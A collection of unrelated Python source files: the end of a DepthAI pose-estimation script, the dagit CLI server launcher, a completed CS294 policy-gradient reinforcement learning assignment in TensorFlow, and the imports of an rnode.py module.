0], [255, 200, 100], [255, 0, 255], [0, 0, 255], [255, 0, 0], [200, 200, 0], [255, 0, 0], [200, 200, 0], [0, 0, 0]] POSE_PAIRS = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], [9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], [0, 15], [15, 17], [2, 17], [5, 16]] running = True pose = None keypoints_list = None detected_keypoints = None personwiseKeypoints = None class FPSHandler: def __init__(self, cap=None): self.timestamp = time.time() self.start = time.time() self.framerate = cap.get(cv2.CAP_PROP_FPS) if cap is not None else None self.frame_cnt = 0 self.ticks = {} self.ticks_cnt = {} def 
next_iter(self): if not args.camera: frame_delay = 1.0 / self.framerate delay = (self.timestamp + frame_delay) - time.time() if delay > 0: time.sleep(delay) self.timestamp = time.time() self.frame_cnt += 1 def tick(self, name): if name in self.ticks: self.ticks_cnt[name] += 1 else: self.ticks[name] = time.time() self.ticks_cnt[name] = 0 def tick_fps(self, name): if name in self.ticks: return self.ticks_cnt[name] / (time.time() - self.ticks[name]) else: return 0 def fps(self): return self.frame_cnt / (self.timestamp - self.start) if args.camera: fps = FPSHandler() else: cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute())) fps = FPSHandler(cap) def pose_thread(in_queue): global keypoints_list, detected_keypoints, personwiseKeypoints while running: try: raw_in = in_queue.get() except RuntimeError: return fps.tick('nn') heatmaps = np.array(raw_in.getLayerFp16('Mconv7_stage2_L2')).reshape((1, 19, 32, 57)) pafs = np.array(raw_in.getLayerFp16('Mconv7_stage2_L1')).reshape((1, 38, 32, 57)) heatmaps = heatmaps.astype('float32') pafs = pafs.astype('float32') outputs = np.concatenate((heatmaps, pafs), axis=1) new_keypoints = [] new_keypoints_list = np.zeros((0, 3)) keypoint_id = 0 for row in range(18): probMap = outputs[0, row, :, :] probMap = cv2.resize(probMap, (w, h)) # (456, 256) keypoints = getKeypoints(probMap, 0.3) new_keypoints_list = np.vstack([new_keypoints_list, *keypoints]) keypoints_with_id = [] for i in range(len(keypoints)): keypoints_with_id.append(keypoints[i] + (keypoint_id,)) keypoint_id += 1 new_keypoints.append(keypoints_with_id) valid_pairs, invalid_pairs = getValidPairs(outputs, w, h, new_keypoints) newPersonwiseKeypoints = getPersonwiseKeypoints(valid_pairs, invalid_pairs, new_keypoints_list) detected_keypoints, keypoints_list, personwiseKeypoints = (new_keypoints, new_keypoints_list, newPersonwiseKeypoints) with dai.Device(create_pipeline()) as device: print("Starting pipeline...") device.startPipeline() if args.camera: cam_out = device.getOutputQueue("cam_out", 1, True) controlQueue = device.getInputQueue('control') else: pose_in = device.getInputQueue("pose_in") pose_nn = device.getOutputQueue("pose_nn", 1, False) t = threading.Thread(target=pose_thread, args=(pose_nn, )) t.start() def should_run(): return cap.isOpened() if args.video else True def get_frame(): if args.video: return cap.read() else: return True, np.array(cam_out.get().getData()).reshape((3, 256, 456)).transpose(1, 2, 0).astype(np.uint8) try: while should_run(): read_correctly, frame = get_frame() if not read_correctly: break fps.next_iter() h, w = frame.shape[:2] # 256, 456 debug_frame = frame.copy() if not args.camera: nn_data = dai.NNData() nn_data.setLayer("input", to_planar(frame, (456, 256))) pose_in.send(nn_data) if debug: if keypoints_list is not None and detected_keypoints is not None and personwiseKeypoints is not None: for i in range(18): for j in range(len(detected_keypoints[i])): cv2.circle(debug_frame, detected_keypoints[i][j][0:2], 5, colors[i], -1, cv2.LINE_AA) for i in range(17): for n in range(len(personwiseKeypoints)): index = personwiseKeypoints[n][np.array(POSE_PAIRS[i])] if -1 in index: continue B = np.int32(keypoints_list[index.astype(int), 0]) A = np.int32(keypoints_list[index.astype(int), 1]) cv2.line(debug_frame, (B[0], A[0]), (B[1], A[1]), colors[i], 3, cv2.LINE_AA) cv2.putText(debug_frame, f"RGB FPS: {round(fps.fps(), 1)}", (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0)) cv2.putText(debug_frame, f"NN FPS: {round(fps.tick_fps('nn'), 1)}", (5, 30), 
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0)) cv2.imshow("rgb", debug_frame) key = cv2.waitKey(1) if key == ord('q'): break elif key == ord('t'): print("Autofocus trigger (and disable continuous)") ctrl = dai.CameraControl() ctrl.setAutoFocusMode(dai.CameraControl.AutoFocusMode.AUTO) ctrl.setAutoFocusTrigger() controlQueue.send(ctrl) except KeyboardInterrupt: pass running = False t.join() print("FPS: {:.2f}".format(fps.fps())) if not args.camera: cap.release()
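# Usage sketch for the `frame_norm` helper defined above: it maps normalized
# [0, 1] bounding-box coordinates to pixel coordinates of a given frame. The
# bbox values below are made up purely for illustration:
#
#   frame = np.zeros((256, 456, 3), dtype=np.uint8)   # h=256, w=456
#   bbox = [0.1, 0.2, 0.5, 0.6]                       # xmin, ymin, xmax, ymax
#   frame_norm(frame, bbox)                           # -> array([ 45,  51, 228, 153])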
cli.py
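# Dagit CLI entry point: resolves a repository/pipeline handle from the CLI arguments and serves the Dagit UI over gevent's WSGI server with websocket support.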
import os import sys import threading import click import six from gevent import pywsgi from geventwebsocket.handler import WebSocketHandler from dagster import ExecutionTargetHandle, check, seven from dagster.cli.load_handle import handle_for_repo_cli_args from dagster.cli.pipeline import repository_target_argument from dagster.core.instance import DagsterInstance from dagster.core.telemetry import upload_logs from dagster.utils import DEFAULT_REPOSITORY_YAML_FILENAME, pushd from .app import create_app from .reloader import DagitReloader from .version import __version__ def create_dagit_cli(): return ui # pylint: disable=no-value-for-parameter REPO_TARGET_WARNING = ( 'Can only use ONE of --repository-yaml/-y, --python-file/-f, --module-name/-m.' ) DEFAULT_DAGIT_HOST = '127.0.0.1' DEFAULT_DAGIT_PORT = 3000 @click.command( name='ui', help=( 'Run dagit. Loads a repository or pipeline.\n\n{warning}'.format( warning=REPO_TARGET_WARNING ) + ( '\n\n Examples:' '\n\n1. dagit' '\n\n2. dagit -y path/to/{default_filename}' '\n\n3. dagit -f path/to/file.py -n define_repo' '\n\n4. dagit -m some_module -n define_repo' '\n\n5. dagit -f path/to/file.py -n define_pipeline' '\n\n6. dagit -m some_module -n define_pipeline' '\n\n7. dagit -p 3333' '\n\nOptions Can also provide arguments via environment variables prefixed with DAGIT_' '\n\n DAGIT_PORT=3333 dagit' ).format(default_filename=DEFAULT_REPOSITORY_YAML_FILENAME) ), ) @repository_target_argument @click.option( '--host', '-h', type=click.STRING, default=DEFAULT_DAGIT_HOST, help="Host to run server on, default is {default_host}".format(default_host=DEFAULT_DAGIT_HOST), ) @click.option( '--port', '-p', type=click.INT, help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT), ) @click.option( '--storage-fallback', help="Base directory for dagster storage if $DAGSTER_HOME is not set", default=None, type=click.Path(), ) @click.option( '--reload-trigger', help=( "Optional file path being monitored by a parent process that dagit-cli can touch to " "re-launch itself." ), default=None, hidden=True, type=click.Path(), ) @click.option( '--workdir', help=( "Set this to change the working directory before invoking dagit. 
Intended to support " "test cases" ), default=None, hidden=True, type=click.Path(), ) @click.version_option(version=__version__, prog_name='dagit') def ui(host, port, storage_fallback, reload_trigger, workdir, **kwargs): handle = handle_for_repo_cli_args(kwargs) # add the path for the cwd so imports in dynamically loaded code work correctly sys.path.append(os.getcwd()) if port is None: port_lookup = True port = DEFAULT_DAGIT_PORT else: port_lookup = False # The dagit entrypoint always sets this but if someone launches dagit-cli # directly make sure things still works by providing a temp directory if storage_fallback is None: storage_fallback = seven.TemporaryDirectory().name if workdir is not None: with pushd(workdir): host_dagit_ui(handle, host, port, storage_fallback, reload_trigger, port_lookup) else: host_dagit_ui(handle, host, port, storage_fallback, reload_trigger, port_lookup) def host_dagit_ui(handle, host, port, storage_fallback, reload_trigger=None, port_lookup=True): check.inst_param(handle, 'handle', ExecutionTargetHandle) instance = DagsterInstance.get(storage_fallback) reloader = DagitReloader(reload_trigger=reload_trigger) app = create_app(handle, instance, reloader) start_server(host, port, app, port_lookup) def start_server(host, port, app, port_lookup, port_lookup_attempts=0): server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler) print( 'Serving on http://{host}:{port} in process {pid}'.format( host=host, port=port, pid=os.getpid() ) ) try: thread = threading.Thread(target=upload_logs, args=()) thread.daemon = True thread.start() server.serve_forever() except OSError as os_error: if 'Address already in use' in str(os_error): if port_lookup and ( port_lookup_attempts > 0 or click.confirm( ( 'Another process on your machine is already listening on port {port}. ' 'Would you like to run the app at another port instead?' ).format(port=port) ) ): port_lookup_attempts += 1 start_server(host, port + port_lookup_attempts, app, True, port_lookup_attempts) else: six.raise_from( Exception( ( 'Another process on your machine is already listening on port {port}. ' 'It is possible that you have another instance of dagit ' 'running somewhere using the same port. Or it could be another ' 'random process. Either kill that process or use the -p option to ' 'select another port.' ).format(port=port) ), os_error, ) else: raise os_error cli = create_dagit_cli() def main(): # click magic cli(auto_envvar_prefix='DAGIT') # pylint:disable=E1120
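# The retry logic in start_server above bumps the port on 'Address already in
# use'. A standalone Python 3 sketch of the same probing idea using plain
# sockets; the function name and search bounds are illustrative assumptions:
import socket

def find_free_port(host='127.0.0.1', start=3000, attempts=10):
    for port in range(start, start + attempts):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            try:
                s.bind((host, port))
                return port
            except OSError:
                continue
    raise RuntimeError('no free port in [{}, {})'.format(start, start + attempts))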
train_pg_f18.py
""" Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017 Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany """ import numpy as np import tensorflow as tf import gym import logz import os import time import inspect from multiprocessing import Process #============================================================================================# # Utilities #============================================================================================# def normalize(values, mean=0., std=1.): values = (values - np.mean(values)) / (np.std(values) + 1e-7) return mean + ((std + 1e-7) * values) #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None): """ Builds a feedforward neural network arguments: input_placeholder: placeholder variable for the state (batch_size, input_size) output_size: size of the output layer scope: variable scope of the network n_layers: number of hidden layers size: dimension of the hidden layer activation: activation of the hidden layers output_activation: activation of the ouput layers returns: output placeholder of the network (the result of a forward pass) Hint: use tf.layers.dense """ # YOUR CODE HERE with tf.variable_scope(scope): x = input_placeholder for i in range(n_layers): x = tf.layers.dense(x, size, activation=activation, name='h{}'.format(i + 1)) output_placeholder = tf.layers.dense(x, output_size, activation=output_activation, name='output') return output_placeholder def pathlength(path): return len(path["reward"]) def setup_logger(logdir, locals_): # Configure output directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) #============================================================================================# # Policy Gradient #============================================================================================# class Agent(object): def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args): super(Agent, self).__init__() self.ob_dim = computation_graph_args['ob_dim'] self.ac_dim = computation_graph_args['ac_dim'] self.discrete = computation_graph_args['discrete'] self.size = computation_graph_args['size'] self.n_layers = computation_graph_args['n_layers'] self.learning_rate = computation_graph_args['learning_rate'] self.animate = sample_trajectory_args['animate'] self.max_path_length = sample_trajectory_args['max_path_length'] self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch'] self.gamma = estimate_return_args['gamma'] self.reward_to_go = estimate_return_args['reward_to_go'] self.nn_baseline = estimate_return_args['nn_baseline'] self.normalize_advantages = estimate_return_args['normalize_advantages'] def init_tf_sess(self): tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) tf_config.gpu_options.allow_growth = True # FIX: Necessary to run multiple seeds without all but one crashing self.sess = tf.Session(config=tf_config) self.sess.__enter__() # equivalent to `with self.sess:` 
tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def define_placeholders(self): """ Placeholders for batch batch observations / actions / advantages in policy gradient loss function. See Agent.build_computation_graph for notation returns: sy_ob_no: placeholder for observations sy_ac_na: placeholder for actions sy_adv_n: placeholder for advantages """ sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32) if self.discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32) # YOUR CODE HERE sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) return sy_ob_no, sy_ac_na, sy_adv_n #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def policy_forward_pass(self, sy_ob_no): """ Constructs the symbolic operation for the policy network outputs, which are the parameters of the policy distribution p(a|s) arguments: sy_ob_no: (batch_size, self.ob_dim) returns: the parameters of the policy. if discrete, the parameters are the logits of a categorical distribution over the actions sy_logits_na: (batch_size, self.ac_dim) if continuous, the parameters are a tuple (mean, log_std) of a Gaussian distribution over actions. log_std should just be a trainable variable, not a network output. sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) Hint: use the 'build_mlp' function to output the logits (in the discrete case) and the mean (in the continuous case). Pass in self.n_layers for the 'n_layers' argument, and pass in self.size for the 'size' argument. """ if self.discrete: # YOUR_CODE_HERE sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_nn', self.n_layers, self.size) return sy_logits_na else: # YOUR_CODE_HERE sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_nn', self.n_layers, self.size) sy_logstd = tf.get_variable('sy_logstd', shape=[self.ac_dim]) return sy_mean, sy_logstd #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def sample_action(self, policy_parameters): """ Constructs a symbolic operation for stochastically sampling from the policy distribution arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) returns: sy_sampled_ac: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) Hint: for the continuous case, use the reparameterization trick: The output from a Gaussian distribution with mean 'mu' and std 'sigma' is mu + sigma * z, z ~ N(0, I) This reduces the problem to just sampling z. (Hint: use tf.random_normal!) 
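            Worked example for the continuous case: with parameters
            (sy_mean, sy_logstd), one reparameterized sample is
                sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
            which is exactly mu + sigma * z with z ~ N(0, I).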
""" if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.random_normal(tf.shape(sy_mean), mean=sy_mean, stddev=tf.exp(sy_logstd)) return sy_sampled_ac #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def get_log_prob(self, policy_parameters, sy_ac_na): """ Constructs a symbolic operation for computing the log probability of a set of actions that were actually taken according to the policy arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) sy_ac_na: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) returns: sy_logprob_n: (batch_size) Hint: For the discrete case, use the log probability under a categorical distribution. For the continuous case, use the log probability under a multivariate gaussian. """ if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE # Log probability under a categorical distribution is equal to the negative cross_entropy sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE multivariate_gaussian = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd)) sy_logprob_n = multivariate_gaussian.log_prob(sy_ac_na) return sy_logprob_n def build_computation_graph(self): """ Notes on notation: Symbolic variables have the prefix sy_, to distinguish them from the numerical values that are computed later in the function Prefixes and suffixes: ob - observation ac - action _no - this tensor should have shape (batch self.size /n/, observation dim) _na - this tensor should have shape (batch self.size /n/, action dim) _n - this tensor should have shape (batch self.size /n/) Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis is None ---------------------------------------------------------------------------------- loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate to get the policy gradient. """ self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders() # The policy takes in an observation and produces a distribution over the action space self.policy_parameters = self.policy_forward_pass(self.sy_ob_no) # We can sample actions from this action distribution. # This will be called in Agent.sample_trajectory() where we generate a rollout. self.sy_sampled_ac = self.sample_action(self.policy_parameters) # We can also compute the logprob of the actions that were actually taken by the policy # This is used in the loss function. 
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na) #========================================================================================# # ----------PROBLEM 2---------- # Loss Function and Training Operation #========================================================================================# # YOUR CODE HERE loss = tf.reduce_mean(-self.sy_logprob_n * self.sy_adv_n) self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss) #========================================================================================# # ----------PROBLEM 6---------- # Optional Baseline # # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. #========================================================================================# if self.nn_baseline: self.baseline_prediction = tf.squeeze(build_mlp( self.sy_ob_no, 1, "nn_baseline", n_layers=self.n_layers, size=self.size)) # YOUR_CODE_HERE self.sy_target_n = tf.placeholder(shape=[None], name="target", dtype=tf.float32) baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n) self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss) def sample_trajectories(self, itr, env): # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate) path = self.sample_trajectory(env, animate_this_episode) paths.append(path) timesteps_this_batch += pathlength(path) if timesteps_this_batch > self.min_timesteps_per_batch: break return paths, timesteps_this_batch def sample_trajectory(self, env, animate_this_episode): ob = env.reset() obs, acs, rewards = [], [], [] steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.1) obs.append(ob) #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[np.newaxis]}) # YOUR CODE HERE ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > self.max_path_length: break path = {"observation" : np.array(obs, dtype=np.float32), "reward" : np.array(rewards, dtype=np.float32), "action" : np.array(acs, dtype=np.float32)} return path #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# def sum_of_rewards(self, re_n): """ Monte Carlo estimation of the Q function. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths ---------------------------------------------------------------------------------- Your code should construct numpy arrays for Q-values which will be used to compute advantages (which will in turn be fed to the placeholder you defined in Agent.define_placeholders). 
Recall that the expression for the policy gradient PG is PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] where tau=(s_0, a_0, ...) is a trajectory, Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), and b_t is a baseline which may depend on s_t. You will write code for two cases, controlled by the flag 'reward_to_go': Case 1: trajectory-based PG (reward_to_go = False) Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over entire trajectory (regardless of which time step the Q-value should be for). For this case, the policy gradient estimator is E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] where Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. Thus, you should compute Q_t = Ret(tau) Case 2: reward-to-go PG (reward_to_go = True) Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting from time step t. Thus, you should compute Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} Store the Q-values for all timesteps and all trajectories in a variable 'q_n', like the 'ob_no' and 'ac_na' above. """ # YOUR_CODE_HERE if self.reward_to_go: def _trajectory_rewards(re): q = np.empty_like(re) q[-1] = re[-1] # Set the reward to go of the last timestep to the last reward # Iterate backwards to compute the rewards to go for each timestep for timestep in range(len(re) - 2, -1, -1): q[timestep] = re[timestep] + self.gamma * q[timestep + 1] return q else: def _trajectory_rewards(re): # Only compute the reward for one timestep in the trajectory, and copy value # This reduces computation time, since all rewards are the same for a given trajectory return [np.sum(np.power(self.gamma, np.arange(len(re))) * re)] * len(re) q_n = np.concatenate([_trajectory_rewards(re) for re in re_n]) return q_n def compute_advantage(self, ob_no, q_n): """ Computes advantages by (possibly) subtracting a baseline from the estimated Q values let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths returns: adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ #====================================================================================# # ----------PROBLEM 6---------- # Computing Baselines #====================================================================================# if self.nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current batch of Q-values. (Goes with Hint # #bl2 in Agent.update_parameters. # YOUR CODE HERE b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no: ob_no}) b_n = normalize(b_n, mean=np.mean(q_n), std=np.std(q_n)) adv_n = q_n - b_n else: adv_n = q_n.copy() return adv_n def estimate_return(self, ob_no, re_n): """ Estimates the returns over a set of trajectories. 
let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ q_n = self.sum_of_rewards(re_n) adv_n = self.compute_advantage(ob_no, q_n) #====================================================================================# # ----------PROBLEM 3---------- # Advantage Normalization #====================================================================================# if self.normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. adv_n = normalize(adv_n) # YOUR_CODE_HERE return q_n, adv_n def update_parameters(self, ob_no, ac_na, q_n, adv_n): """ Update the parameters of the policy and (possibly) the neural network baseline, which is trained to approximate the value function. arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) ac_na: shape: (sum_of_path_lengths). q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths returns: nothing """ #====================================================================================# # ----------PROBLEM 6---------- # Optimizing Neural Network Baseline #====================================================================================# if self.nn_baseline: # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 in # Agent.compute_advantage.) # YOUR_CODE_HERE target_n = normalize(q_n) self.sess.run(self.baseline_update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_target_n: target_n}) #====================================================================================# # ----------PROBLEM 3---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. # # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. 
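        # A single run of `update_op` below performs one Adam step on the
        # surrogate loss mean(-logprob * advantage) over the whole batch of
        # rollouts.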
# YOUR_CODE_HERE self.sess.run(self.update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n}) def train_PG( exp_name, env_name, n_iter, gamma, min_timesteps_per_batch, max_path_length, learning_rate, reward_to_go, animate, logdir, normalize_advantages, nn_baseline, seed, n_layers, size): start = time.time() #========================================================================================# # Set Up Logger #========================================================================================# setup_logger(logdir, locals()) #========================================================================================# # Set Up Env #========================================================================================# # Make the gym environment env = gym.make(env_name) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) env.seed(seed) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps # Is this env continuous, or self.discrete? discrete = isinstance(env.action_space, gym.spaces.Discrete) # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # Initialize Agent #========================================================================================# computation_graph_args = { 'n_layers': n_layers, 'ob_dim': ob_dim, 'ac_dim': ac_dim, 'discrete': discrete, 'size': size, 'learning_rate': learning_rate, } sample_trajectory_args = { 'animate': animate, 'max_path_length': max_path_length, 'min_timesteps_per_batch': min_timesteps_per_batch, } estimate_return_args = { 'gamma': gamma, 'reward_to_go': reward_to_go, 'nn_baseline': nn_baseline, 'normalize_advantages': normalize_advantages, } agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args) # build computation graph agent.build_computation_graph() # tensorflow: config, session, variable initialization agent.init_tf_sess() #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) paths, timesteps_this_batch = agent.sample_trajectories(itr, env) total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) re_n = [path["reward"] for path in paths] q_n, adv_n = agent.estimate_return(ob_no, re_n) agent.update_parameters(ob_no, ac_na, q_n, adv_n) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = 
argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vpg')
    parser.add_argument('--no_time', '-nt', action='store_true')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--reward_to_go', '-rtg', action='store_true')
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--nn_baseline', '-bl', action='store_true')
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)
    parser.add_argument('--n_layers', '-l', type=int, default=2)
    parser.add_argument('--size', '-s', type=int, default=64)
    args = parser.parse_args()

    if not os.path.exists('data'):
        os.makedirs('data')
    logdir = args.exp_name + '_' + args.env_name
    if not args.no_time:
        logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join('data', logdir)
    if not os.path.exists(logdir):
        os.makedirs(logdir)

    max_path_length = args.ep_len if args.ep_len > 0 else None

    processes = []

    for e in range(args.n_experiments):
        seed = args.seed + 10 * e
        print('Running experiment with seed %d' % seed)

        def train_func():
            train_PG(
                exp_name=args.exp_name,
                env_name=args.env_name,
                n_iter=args.n_iter,
                gamma=args.discount,
                min_timesteps_per_batch=args.batch_size,
                max_path_length=max_path_length,
                learning_rate=args.learning_rate,
                reward_to_go=args.reward_to_go,
                animate=args.render,
                logdir=os.path.join(logdir, '%d' % seed),
                normalize_advantages=not args.dont_normalize_advantages,
                nn_baseline=args.nn_baseline,
                seed=seed,
                n_layers=args.n_layers,
                size=args.size
            )

        # Awkward hacky process runs, because Tensorflow does not like
        # repeatedly calling train_PG in the same thread.
        p = Process(target=train_func, args=tuple())
        p.start()
        processes.append(p)
        # if you comment in the line below, then the loop will block
        # until this process finishes
        # p.join()

    for p in processes:
        p.join()


if __name__ == "__main__":
    main()
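# A hedged worked example of the reward-to-go estimator implemented in
# Agent.sum_of_rewards above (standalone numpy sketch; the variable names are
# illustrative, not part of the assignment scaffold):
#
#     import numpy as np
#
#     gamma = 0.9
#     rewards = np.array([1.0, 2.0, 3.0])
#     q = np.zeros_like(rewards)
#     running = 0.0
#     for t in reversed(range(len(rewards))):
#         # Q_t = r_t + gamma * Q_{t+1}  (discounted sum from t onwards)
#         running = rewards[t] + gamma * running
#         q[t] = running
#     # q == [5.23, 4.7, 3.0]: e.g. q[0] = 1 + 0.9 * (2 + 0.9 * 3)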
rnode.py
import functools
import re
import os
import queue
import shlex
import string
import time
import shutil
import logging
from logging import Logger
import threading
from threading import Event
import contextlib
from multiprocessing import Queue, Process
from typing import (
    Dict,
    List,
    Tuple,
    Optional,
    Generator,
    AbstractSet,
    Set,
)
from dataclasses import dataclass

import requests
from rchain.client import RClient, RClientException
